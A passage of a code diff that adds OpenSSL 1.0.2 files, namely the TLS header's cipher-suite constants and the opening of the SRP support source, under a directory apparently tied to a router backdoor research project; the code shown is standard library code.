+# define TLS1_CK_DH_DSS_WITH_AES_256_GCM_SHA384          0x030000A5
+# define TLS1_CK_ADH_WITH_AES_128_GCM_SHA256             0x030000A6
+# define TLS1_CK_ADH_WITH_AES_256_GCM_SHA384             0x030000A7
+
+/*
+ * ECC ciphersuites from draft-ietf-tls-ecc-12.txt with changes soon to be in
+ * draft 13
+ */
+# define TLS1_CK_ECDH_ECDSA_WITH_NULL_SHA                0x0300C001
+# define TLS1_CK_ECDH_ECDSA_WITH_RC4_128_SHA             0x0300C002
+# define TLS1_CK_ECDH_ECDSA_WITH_DES_192_CBC3_SHA        0x0300C003
+# define TLS1_CK_ECDH_ECDSA_WITH_AES_128_CBC_SHA         0x0300C004
+# define TLS1_CK_ECDH_ECDSA_WITH_AES_256_CBC_SHA         0x0300C005
+
+# define TLS1_CK_ECDHE_ECDSA_WITH_NULL_SHA               0x0300C006
+# define TLS1_CK_ECDHE_ECDSA_WITH_RC4_128_SHA            0x0300C007
+# define TLS1_CK_ECDHE_ECDSA_WITH_DES_192_CBC3_SHA       0x0300C008
+# define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_CBC_SHA        0x0300C009
+# define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_CBC_SHA        0x0300C00A
+
+# define TLS1_CK_ECDH_RSA_WITH_NULL_SHA                  0x0300C00B
+# define TLS1_CK_ECDH_RSA_WITH_RC4_128_SHA               0x0300C00C
+# define TLS1_CK_ECDH_RSA_WITH_DES_192_CBC3_SHA          0x0300C00D
+# define TLS1_CK_ECDH_RSA_WITH_AES_128_CBC_SHA           0x0300C00E
+# define TLS1_CK_ECDH_RSA_WITH_AES_256_CBC_SHA           0x0300C00F
+
+# define TLS1_CK_ECDHE_RSA_WITH_NULL_SHA                 0x0300C010
+# define TLS1_CK_ECDHE_RSA_WITH_RC4_128_SHA              0x0300C011
+# define TLS1_CK_ECDHE_RSA_WITH_DES_192_CBC3_SHA         0x0300C012
+# define TLS1_CK_ECDHE_RSA_WITH_AES_128_CBC_SHA          0x0300C013
+# define TLS1_CK_ECDHE_RSA_WITH_AES_256_CBC_SHA          0x0300C014
+
+# define TLS1_CK_ECDH_anon_WITH_NULL_SHA                 0x0300C015
+# define TLS1_CK_ECDH_anon_WITH_RC4_128_SHA              0x0300C016
+# define TLS1_CK_ECDH_anon_WITH_DES_192_CBC3_SHA         0x0300C017
+# define TLS1_CK_ECDH_anon_WITH_AES_128_CBC_SHA          0x0300C018
+# define TLS1_CK_ECDH_anon_WITH_AES_256_CBC_SHA          0x0300C019
+
+/* SRP ciphersuites from RFC 5054 */
+# define TLS1_CK_SRP_SHA_WITH_3DES_EDE_CBC_SHA           0x0300C01A
+# define TLS1_CK_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA       0x0300C01B
+# define TLS1_CK_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA       0x0300C01C
+# define TLS1_CK_SRP_SHA_WITH_AES_128_CBC_SHA            0x0300C01D
+# define TLS1_CK_SRP_SHA_RSA_WITH_AES_128_CBC_SHA        0x0300C01E
+# define TLS1_CK_SRP_SHA_DSS_WITH_AES_128_CBC_SHA        0x0300C01F
+# define TLS1_CK_SRP_SHA_WITH_AES_256_CBC_SHA            0x0300C020
+# define TLS1_CK_SRP_SHA_RSA_WITH_AES_256_CBC_SHA        0x0300C021
+# define TLS1_CK_SRP_SHA_DSS_WITH_AES_256_CBC_SHA        0x0300C022
+
+/* ECDH HMAC based ciphersuites from RFC5289 */
+
+# define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_SHA256         0x0300C023
+# define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_SHA384         0x0300C024
+# define TLS1_CK_ECDH_ECDSA_WITH_AES_128_SHA256          0x0300C025
+# define TLS1_CK_ECDH_ECDSA_WITH_AES_256_SHA384          0x0300C026
+# define TLS1_CK_ECDHE_RSA_WITH_AES_128_SHA256           0x0300C027
+# define TLS1_CK_ECDHE_RSA_WITH_AES_256_SHA384           0x0300C028
+# define TLS1_CK_ECDH_RSA_WITH_AES_128_SHA256            0x0300C029
+# define TLS1_CK_ECDH_RSA_WITH_AES_256_SHA384            0x0300C02A
+
+/* ECDH GCM based ciphersuites from RFC5289 */
+# define TLS1_CK_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256     0x0300C02B
+# define TLS1_CK_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384     0x0300C02C
+# define TLS1_CK_ECDH_ECDSA_WITH_AES_128_GCM_SHA256      0x0300C02D
+# define TLS1_CK_ECDH_ECDSA_WITH_AES_256_GCM_SHA384      0x0300C02E
+# define TLS1_CK_ECDHE_RSA_WITH_AES_128_GCM_SHA256       0x0300C02F
+# define TLS1_CK_ECDHE_RSA_WITH_AES_256_GCM_SHA384       0x0300C030
+# define TLS1_CK_ECDH_RSA_WITH_AES_128_GCM_SHA256        0x0300C031
+# define TLS1_CK_ECDH_RSA_WITH_AES_256_GCM_SHA384        0x0300C032
+
+/*
+ * XXX * Backward compatibility alert: + * Older versions of OpenSSL gave
+ * some DHE ciphers names with "EDH" + * instead of "DHE".  Going forward, we
+ * should be using DHE + * everywhere, though we may indefinitely maintain
+ * aliases for users + * or configurations that used "EDH" +
+ */
+# define TLS1_TXT_RSA_EXPORT1024_WITH_RC4_56_MD5         "EXP1024-RC4-MD5"
+# define TLS1_TXT_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5     "EXP1024-RC2-CBC-MD5"
+# define TLS1_TXT_RSA_EXPORT1024_WITH_DES_CBC_SHA        "EXP1024-DES-CBC-SHA"
+# define TLS1_TXT_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA    "EXP1024-DHE-DSS-DES-CBC-SHA"
+# define TLS1_TXT_RSA_EXPORT1024_WITH_RC4_56_SHA         "EXP1024-RC4-SHA"
+# define TLS1_TXT_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA     "EXP1024-DHE-DSS-RC4-SHA"
+# define TLS1_TXT_DHE_DSS_WITH_RC4_128_SHA               "DHE-DSS-RC4-SHA"
+
+/* AES ciphersuites from RFC3268 */
+# define TLS1_TXT_RSA_WITH_AES_128_SHA                   "AES128-SHA"
+# define TLS1_TXT_DH_DSS_WITH_AES_128_SHA                "DH-DSS-AES128-SHA"
+# define TLS1_TXT_DH_RSA_WITH_AES_128_SHA                "DH-RSA-AES128-SHA"
+# define TLS1_TXT_DHE_DSS_WITH_AES_128_SHA               "DHE-DSS-AES128-SHA"
+# define TLS1_TXT_DHE_RSA_WITH_AES_128_SHA               "DHE-RSA-AES128-SHA"
+# define TLS1_TXT_ADH_WITH_AES_128_SHA                   "ADH-AES128-SHA"
+
+# define TLS1_TXT_RSA_WITH_AES_256_SHA                   "AES256-SHA"
+# define TLS1_TXT_DH_DSS_WITH_AES_256_SHA                "DH-DSS-AES256-SHA"
+# define TLS1_TXT_DH_RSA_WITH_AES_256_SHA                "DH-RSA-AES256-SHA"
+# define TLS1_TXT_DHE_DSS_WITH_AES_256_SHA               "DHE-DSS-AES256-SHA"
+# define TLS1_TXT_DHE_RSA_WITH_AES_256_SHA               "DHE-RSA-AES256-SHA"
+# define TLS1_TXT_ADH_WITH_AES_256_SHA                   "ADH-AES256-SHA"
+
+/* ECC ciphersuites from draft-ietf-tls-ecc-01.txt (Mar 15, 2001) */
+# define TLS1_TXT_ECDH_ECDSA_WITH_NULL_SHA               "ECDH-ECDSA-NULL-SHA"
+# define TLS1_TXT_ECDH_ECDSA_WITH_RC4_128_SHA            "ECDH-ECDSA-RC4-SHA"
+# define TLS1_TXT_ECDH_ECDSA_WITH_DES_192_CBC3_SHA       "ECDH-ECDSA-DES-CBC3-SHA"
+# define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_CBC_SHA        "ECDH-ECDSA-AES128-SHA"
+# define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_CBC_SHA        "ECDH-ECDSA-AES256-SHA"
+
+# define TLS1_TXT_ECDHE_ECDSA_WITH_NULL_SHA              "ECDHE-ECDSA-NULL-SHA"
+# define TLS1_TXT_ECDHE_ECDSA_WITH_RC4_128_SHA           "ECDHE-ECDSA-RC4-SHA"
+# define TLS1_TXT_ECDHE_ECDSA_WITH_DES_192_CBC3_SHA      "ECDHE-ECDSA-DES-CBC3-SHA"
+# define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_CBC_SHA       "ECDHE-ECDSA-AES128-SHA"
+# define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_CBC_SHA       "ECDHE-ECDSA-AES256-SHA"
+
+# define TLS1_TXT_ECDH_RSA_WITH_NULL_SHA                 "ECDH-RSA-NULL-SHA"
+# define TLS1_TXT_ECDH_RSA_WITH_RC4_128_SHA              "ECDH-RSA-RC4-SHA"
+# define TLS1_TXT_ECDH_RSA_WITH_DES_192_CBC3_SHA         "ECDH-RSA-DES-CBC3-SHA"
+# define TLS1_TXT_ECDH_RSA_WITH_AES_128_CBC_SHA          "ECDH-RSA-AES128-SHA"
+# define TLS1_TXT_ECDH_RSA_WITH_AES_256_CBC_SHA          "ECDH-RSA-AES256-SHA"
+
+# define TLS1_TXT_ECDHE_RSA_WITH_NULL_SHA                "ECDHE-RSA-NULL-SHA"
+# define TLS1_TXT_ECDHE_RSA_WITH_RC4_128_SHA             "ECDHE-RSA-RC4-SHA"
+# define TLS1_TXT_ECDHE_RSA_WITH_DES_192_CBC3_SHA        "ECDHE-RSA-DES-CBC3-SHA"
+# define TLS1_TXT_ECDHE_RSA_WITH_AES_128_CBC_SHA         "ECDHE-RSA-AES128-SHA"
+# define TLS1_TXT_ECDHE_RSA_WITH_AES_256_CBC_SHA         "ECDHE-RSA-AES256-SHA"
+
+# define TLS1_TXT_ECDH_anon_WITH_NULL_SHA                "AECDH-NULL-SHA"
+# define TLS1_TXT_ECDH_anon_WITH_RC4_128_SHA             "AECDH-RC4-SHA"
+# define TLS1_TXT_ECDH_anon_WITH_DES_192_CBC3_SHA        "AECDH-DES-CBC3-SHA"
+# define TLS1_TXT_ECDH_anon_WITH_AES_128_CBC_SHA         "AECDH-AES128-SHA"
+# define TLS1_TXT_ECDH_anon_WITH_AES_256_CBC_SHA         "AECDH-AES256-SHA"
+
+/* PSK ciphersuites from RFC 4279 */
+# define TLS1_TXT_PSK_WITH_RC4_128_SHA                   "PSK-RC4-SHA"
+# define TLS1_TXT_PSK_WITH_3DES_EDE_CBC_SHA              "PSK-3DES-EDE-CBC-SHA"
+# define TLS1_TXT_PSK_WITH_AES_128_CBC_SHA               "PSK-AES128-CBC-SHA"
+# define TLS1_TXT_PSK_WITH_AES_256_CBC_SHA               "PSK-AES256-CBC-SHA"
+
+/* SRP ciphersuite from RFC 5054 */
+# define TLS1_TXT_SRP_SHA_WITH_3DES_EDE_CBC_SHA          "SRP-3DES-EDE-CBC-SHA"
+# define TLS1_TXT_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA      "SRP-RSA-3DES-EDE-CBC-SHA"
+# define TLS1_TXT_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA      "SRP-DSS-3DES-EDE-CBC-SHA"
+# define TLS1_TXT_SRP_SHA_WITH_AES_128_CBC_SHA           "SRP-AES-128-CBC-SHA"
+# define TLS1_TXT_SRP_SHA_RSA_WITH_AES_128_CBC_SHA       "SRP-RSA-AES-128-CBC-SHA"
+# define TLS1_TXT_SRP_SHA_DSS_WITH_AES_128_CBC_SHA       "SRP-DSS-AES-128-CBC-SHA"
+# define TLS1_TXT_SRP_SHA_WITH_AES_256_CBC_SHA           "SRP-AES-256-CBC-SHA"
+# define TLS1_TXT_SRP_SHA_RSA_WITH_AES_256_CBC_SHA       "SRP-RSA-AES-256-CBC-SHA"
+# define TLS1_TXT_SRP_SHA_DSS_WITH_AES_256_CBC_SHA       "SRP-DSS-AES-256-CBC-SHA"
+
+/* Camellia ciphersuites from RFC4132 */
+# define TLS1_TXT_RSA_WITH_CAMELLIA_128_CBC_SHA          "CAMELLIA128-SHA"
+# define TLS1_TXT_DH_DSS_WITH_CAMELLIA_128_CBC_SHA       "DH-DSS-CAMELLIA128-SHA"
+# define TLS1_TXT_DH_RSA_WITH_CAMELLIA_128_CBC_SHA       "DH-RSA-CAMELLIA128-SHA"
+# define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA      "DHE-DSS-CAMELLIA128-SHA"
+# define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA      "DHE-RSA-CAMELLIA128-SHA"
+# define TLS1_TXT_ADH_WITH_CAMELLIA_128_CBC_SHA          "ADH-CAMELLIA128-SHA"
+
+# define TLS1_TXT_RSA_WITH_CAMELLIA_256_CBC_SHA          "CAMELLIA256-SHA"
+# define TLS1_TXT_DH_DSS_WITH_CAMELLIA_256_CBC_SHA       "DH-DSS-CAMELLIA256-SHA"
+# define TLS1_TXT_DH_RSA_WITH_CAMELLIA_256_CBC_SHA       "DH-RSA-CAMELLIA256-SHA"
+# define TLS1_TXT_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA      "DHE-DSS-CAMELLIA256-SHA"
+# define TLS1_TXT_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA      "DHE-RSA-CAMELLIA256-SHA"
+# define TLS1_TXT_ADH_WITH_CAMELLIA_256_CBC_SHA          "ADH-CAMELLIA256-SHA"
+
+/* SEED ciphersuites from RFC4162 */
+# define TLS1_TXT_RSA_WITH_SEED_SHA                      "SEED-SHA"
+# define TLS1_TXT_DH_DSS_WITH_SEED_SHA                   "DH-DSS-SEED-SHA"
+# define TLS1_TXT_DH_RSA_WITH_SEED_SHA                   "DH-RSA-SEED-SHA"
+# define TLS1_TXT_DHE_DSS_WITH_SEED_SHA                  "DHE-DSS-SEED-SHA"
+# define TLS1_TXT_DHE_RSA_WITH_SEED_SHA                  "DHE-RSA-SEED-SHA"
+# define TLS1_TXT_ADH_WITH_SEED_SHA                      "ADH-SEED-SHA"
+
+/* TLS v1.2 ciphersuites */
+# define TLS1_TXT_RSA_WITH_NULL_SHA256                   "NULL-SHA256"
+# define TLS1_TXT_RSA_WITH_AES_128_SHA256                "AES128-SHA256"
+# define TLS1_TXT_RSA_WITH_AES_256_SHA256                "AES256-SHA256"
+# define TLS1_TXT_DH_DSS_WITH_AES_128_SHA256             "DH-DSS-AES128-SHA256"
+# define TLS1_TXT_DH_RSA_WITH_AES_128_SHA256             "DH-RSA-AES128-SHA256"
+# define TLS1_TXT_DHE_DSS_WITH_AES_128_SHA256            "DHE-DSS-AES128-SHA256"
+# define TLS1_TXT_DHE_RSA_WITH_AES_128_SHA256            "DHE-RSA-AES128-SHA256"
+# define TLS1_TXT_DH_DSS_WITH_AES_256_SHA256             "DH-DSS-AES256-SHA256"
+# define TLS1_TXT_DH_RSA_WITH_AES_256_SHA256             "DH-RSA-AES256-SHA256"
+# define TLS1_TXT_DHE_DSS_WITH_AES_256_SHA256            "DHE-DSS-AES256-SHA256"
+# define TLS1_TXT_DHE_RSA_WITH_AES_256_SHA256            "DHE-RSA-AES256-SHA256"
+# define TLS1_TXT_ADH_WITH_AES_128_SHA256                "ADH-AES128-SHA256"
+# define TLS1_TXT_ADH_WITH_AES_256_SHA256                "ADH-AES256-SHA256"
+
+/* TLS v1.2 GCM ciphersuites from RFC5288 */
+# define TLS1_TXT_RSA_WITH_AES_128_GCM_SHA256            "AES128-GCM-SHA256"
+# define TLS1_TXT_RSA_WITH_AES_256_GCM_SHA384            "AES256-GCM-SHA384"
+# define TLS1_TXT_DHE_RSA_WITH_AES_128_GCM_SHA256        "DHE-RSA-AES128-GCM-SHA256"
+# define TLS1_TXT_DHE_RSA_WITH_AES_256_GCM_SHA384        "DHE-RSA-AES256-GCM-SHA384"
+# define TLS1_TXT_DH_RSA_WITH_AES_128_GCM_SHA256         "DH-RSA-AES128-GCM-SHA256"
+# define TLS1_TXT_DH_RSA_WITH_AES_256_GCM_SHA384         "DH-RSA-AES256-GCM-SHA384"
+# define TLS1_TXT_DHE_DSS_WITH_AES_128_GCM_SHA256        "DHE-DSS-AES128-GCM-SHA256"
+# define TLS1_TXT_DHE_DSS_WITH_AES_256_GCM_SHA384        "DHE-DSS-AES256-GCM-SHA384"
+# define TLS1_TXT_DH_DSS_WITH_AES_128_GCM_SHA256         "DH-DSS-AES128-GCM-SHA256"
+# define TLS1_TXT_DH_DSS_WITH_AES_256_GCM_SHA384         "DH-DSS-AES256-GCM-SHA384"
+# define TLS1_TXT_ADH_WITH_AES_128_GCM_SHA256            "ADH-AES128-GCM-SHA256"
+# define TLS1_TXT_ADH_WITH_AES_256_GCM_SHA384            "ADH-AES256-GCM-SHA384"
+
+/* ECDH HMAC based ciphersuites from RFC5289 */
+
+# define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_SHA256    "ECDHE-ECDSA-AES128-SHA256"
+# define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_SHA384    "ECDHE-ECDSA-AES256-SHA384"
+# define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_SHA256     "ECDH-ECDSA-AES128-SHA256"
+# define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_SHA384     "ECDH-ECDSA-AES256-SHA384"
+# define TLS1_TXT_ECDHE_RSA_WITH_AES_128_SHA256      "ECDHE-RSA-AES128-SHA256"
+# define TLS1_TXT_ECDHE_RSA_WITH_AES_256_SHA384      "ECDHE-RSA-AES256-SHA384"
+# define TLS1_TXT_ECDH_RSA_WITH_AES_128_SHA256       "ECDH-RSA-AES128-SHA256"
+# define TLS1_TXT_ECDH_RSA_WITH_AES_256_SHA384       "ECDH-RSA-AES256-SHA384"
+
+/* ECDH GCM based ciphersuites from RFC5289 */
+# define TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256    "ECDHE-ECDSA-AES128-GCM-SHA256"
+# define TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384    "ECDHE-ECDSA-AES256-GCM-SHA384"
+# define TLS1_TXT_ECDH_ECDSA_WITH_AES_128_GCM_SHA256     "ECDH-ECDSA-AES128-GCM-SHA256"
+# define TLS1_TXT_ECDH_ECDSA_WITH_AES_256_GCM_SHA384     "ECDH-ECDSA-AES256-GCM-SHA384"
+# define TLS1_TXT_ECDHE_RSA_WITH_AES_128_GCM_SHA256      "ECDHE-RSA-AES128-GCM-SHA256"
+# define TLS1_TXT_ECDHE_RSA_WITH_AES_256_GCM_SHA384      "ECDHE-RSA-AES256-GCM-SHA384"
+# define TLS1_TXT_ECDH_RSA_WITH_AES_128_GCM_SHA256       "ECDH-RSA-AES128-GCM-SHA256"
+# define TLS1_TXT_ECDH_RSA_WITH_AES_256_GCM_SHA384       "ECDH-RSA-AES256-GCM-SHA384"
+
+# define TLS_CT_RSA_SIGN                 1
+# define TLS_CT_DSS_SIGN                 2
+# define TLS_CT_RSA_FIXED_DH             3
+# define TLS_CT_DSS_FIXED_DH             4
+# define TLS_CT_ECDSA_SIGN               64
+# define TLS_CT_RSA_FIXED_ECDH           65
+# define TLS_CT_ECDSA_FIXED_ECDH         66
+# define TLS_CT_GOST94_SIGN              21
+# define TLS_CT_GOST01_SIGN              22
+/*
+ * when correcting this number, correct also SSL3_CT_NUMBER in ssl3.h (see
+ * comment there)
+ */
+# define TLS_CT_NUMBER                   9
+
+# define TLS1_FINISH_MAC_LENGTH          12
+
+# define TLS_MD_MAX_CONST_SIZE                   20
+# define TLS_MD_CLIENT_FINISH_CONST              "client finished"
+# define TLS_MD_CLIENT_FINISH_CONST_SIZE         15
+# define TLS_MD_SERVER_FINISH_CONST              "server finished"
+# define TLS_MD_SERVER_FINISH_CONST_SIZE         15
+# define TLS_MD_SERVER_WRITE_KEY_CONST           "server write key"
+# define TLS_MD_SERVER_WRITE_KEY_CONST_SIZE      16
+# define TLS_MD_KEY_EXPANSION_CONST              "key expansion"
+# define TLS_MD_KEY_EXPANSION_CONST_SIZE         13
+# define TLS_MD_CLIENT_WRITE_KEY_CONST           "client write key"
+# define TLS_MD_CLIENT_WRITE_KEY_CONST_SIZE      16
+# define TLS_MD_SERVER_WRITE_KEY_CONST           "server write key"
+# define TLS_MD_SERVER_WRITE_KEY_CONST_SIZE      16
+# define TLS_MD_IV_BLOCK_CONST                   "IV block"
+# define TLS_MD_IV_BLOCK_CONST_SIZE              8
+# define TLS_MD_MASTER_SECRET_CONST              "master secret"
+# define TLS_MD_MASTER_SECRET_CONST_SIZE         13
+
+# ifdef CHARSET_EBCDIC
+#  undef TLS_MD_CLIENT_FINISH_CONST
+/*
+ * client finished
+ */
+#  define TLS_MD_CLIENT_FINISH_CONST    "\x63\x6c\x69\x65\x6e\x74\x20\x66\x69\x6e\x69\x73\x68\x65\x64"
+
+#  undef TLS_MD_SERVER_FINISH_CONST
+/*
+ * server finished
+ */
+#  define TLS_MD_SERVER_FINISH_CONST    "\x73\x65\x72\x76\x65\x72\x20\x66\x69\x6e\x69\x73\x68\x65\x64"
+
+#  undef TLS_MD_SERVER_WRITE_KEY_CONST
+/*
+ * server write key
+ */
+#  define TLS_MD_SERVER_WRITE_KEY_CONST "\x73\x65\x72\x76\x65\x72\x20\x77\x72\x69\x74\x65\x20\x6b\x65\x79"
+
+#  undef TLS_MD_KEY_EXPANSION_CONST
+/*
+ * key expansion
+ */
+#  define TLS_MD_KEY_EXPANSION_CONST    "\x6b\x65\x79\x20\x65\x78\x70\x61\x6e\x73\x69\x6f\x6e"
+
+#  undef TLS_MD_CLIENT_WRITE_KEY_CONST
+/*
+ * client write key
+ */
+#  define TLS_MD_CLIENT_WRITE_KEY_CONST "\x63\x6c\x69\x65\x6e\x74\x20\x77\x72\x69\x74\x65\x20\x6b\x65\x79"
+
+#  undef TLS_MD_SERVER_WRITE_KEY_CONST
+/*
+ * server write key
+ */
+#  define TLS_MD_SERVER_WRITE_KEY_CONST "\x73\x65\x72\x76\x65\x72\x20\x77\x72\x69\x74\x65\x20\x6b\x65\x79"
+
+#  undef TLS_MD_IV_BLOCK_CONST
+/*
+ * IV block
+ */
+#  define TLS_MD_IV_BLOCK_CONST         "\x49\x56\x20\x62\x6c\x6f\x63\x6b"
+
+#  undef TLS_MD_MASTER_SECRET_CONST
+/*
+ * master secret
+ */
+#  define TLS_MD_MASTER_SECRET_CONST    "\x6d\x61\x73\x74\x65\x72\x20\x73\x65\x63\x72\x65\x74"
+# endif
+
+/* TLS Session Ticket extension struct */
+struct tls_session_ticket_ext_st {
+    unsigned short length;
+    void *data;
+};
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/tls_srp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/tls_srp.c
new file mode 100644
index 0000000..d36cfa0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/tls_srp.c
@@ -0,0 +1,541 @@
+/* ssl/tls_srp.c */
+/*
+ * Written by Christophe Renou (christophe.renou@edelweb.fr) with the
+ * precious help of Peter Sylvester (peter.sylvester@edelweb.fr) for the
+ * EdelKey project and contributed to the OpenSSL project 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#include "ssl_locl.h"
+#ifndef OPENSSL_NO_SRP
+
+# include <openssl/rand.h>
+# include <openssl/srp.h>
+# include <openssl/err.h>
+
+int SSL_CTX_SRP_CTX_free(struct ssl_ctx_st *ctx)
+{
+    if (ctx == NULL)
+        return 0;
+    OPENSSL_free(ctx->srp_ctx.login);
+    BN_free(ctx->srp_ctx.N);
+    BN_free(ctx->srp_ctx.g);
+    BN_free(ctx->srp_ctx.s);
+    BN_free(ctx->srp_ctx.B);
+    BN_free(ctx->srp_ctx.A);
+    BN_free(ctx->srp_ctx.a);
+    BN_free(ctx->srp_ctx.b);
+    BN_free(ctx->srp_ctx.v);
+    ctx->srp_ctx.TLS_ext_srp_username_callback = NULL;
+    ctx->srp_ctx.SRP_cb_arg = NULL;
+    ctx->srp_ctx.SRP_verify_param_callback = NULL;
+    ctx->srp_ctx.SRP_give_srp_client_pwd_callback = NULL;
+    ctx->srp_ctx.N = NULL;
+    ctx->srp_ctx.g = NULL;
+    ctx->srp_ctx.s = NULL;
+    ctx->srp_ctx.B = NULL;
+    ctx->srp_ctx.A = NULL;
+    ctx->srp_ctx.a = NULL;
+    ctx->srp_ctx.b = NULL;
+    ctx->srp_ctx.v = NULL;
+    ctx->srp_ctx.login = NULL;
+    ctx->srp_ctx.info = NULL;
+    ctx->srp_ctx.strength = SRP_MINIMAL_N;
+    ctx->srp_ctx.srp_Mask = 0;
+    return (1);
+}
+
+int SSL_SRP_CTX_free(struct ssl_st *s)
+{
+    if (s == NULL)
+        return 0;
+    OPENSSL_free(s->srp_ctx.login);
+    BN_free(s->srp_ctx.N);
+    BN_free(s->srp_ctx.g);
+    BN_free(s->srp_ctx.s);
+    BN_free(s->srp_ctx.B);
+    BN_free(s->srp_ctx.A);
+    BN_free(s->srp_ctx.a);
+    BN_free(s->srp_ctx.b);
+    BN_free(s->srp_ctx.v);
+    s->srp_ctx.TLS_ext_srp_username_callback = NULL;
+    s->srp_ctx.SRP_cb_arg = NULL;
+    s->srp_ctx.SRP_verify_param_callback = NULL;
+    s->srp_ctx.SRP_give_srp_client_pwd_callback = NULL;
+    s->srp_ctx.N = NULL;
+    s->srp_ctx.g = NULL;
+    s->srp_ctx.s = NULL;
+    s->srp_ctx.B = NULL;
+    s->srp_ctx.A = NULL;
+    s->srp_ctx.a = NULL;
+    s->srp_ctx.b = NULL;
+    s->srp_ctx.v = NULL;
+    s->srp_ctx.login = NULL;
+    s->srp_ctx.info = NULL;
+    s->srp_ctx.strength = SRP_MINIMAL_N;
+    s->srp_ctx.srp_Mask = 0;
+    return (1);
+}
+
+int SSL_SRP_CTX_init(struct ssl_st *s)
+{
+    SSL_CTX *ctx;
+
+    if ((s == NULL) || ((ctx = s->ctx) == NULL))
+        return 0;
+    s->srp_ctx.SRP_cb_arg = ctx->srp_ctx.SRP_cb_arg;
+    /* set client Hello login callback */
+    s->srp_ctx.TLS_ext_srp_username_callback =
+        ctx->srp_ctx.TLS_ext_srp_username_callback;
+    /* set SRP N/g param callback for verification */
+    s->srp_ctx.SRP_verify_param_callback =
+        ctx->srp_ctx.SRP_verify_param_callback;
+    /* set SRP client passwd callback */
+    s->srp_ctx.SRP_give_srp_client_pwd_callback =
+        ctx->srp_ctx.SRP_give_srp_client_pwd_callback;
+
+    s->srp_ctx.N = NULL;
+    s->srp_ctx.g = NULL;
+    s->srp_ctx.s = NULL;
+    s->srp_ctx.B = NULL;
+    s->srp_ctx.A = NULL;
+    s->srp_ctx.a = NULL;
+    s->srp_ctx.b = NULL;
+    s->srp_ctx.v = NULL;
+    s->srp_ctx.login = NULL;
+    s->srp_ctx.info = ctx->srp_ctx.info;
+    s->srp_ctx.strength = ctx->srp_ctx.strength;
+
+    if (((ctx->srp_ctx.N != NULL) &&
+         ((s->srp_ctx.N = BN_dup(ctx->srp_ctx.N)) == NULL)) ||
+        ((ctx->srp_ctx.g != NULL) &&
+         ((s->srp_ctx.g = BN_dup(ctx->srp_ctx.g)) == NULL)) ||
+        ((ctx->srp_ctx.s != NULL) &&
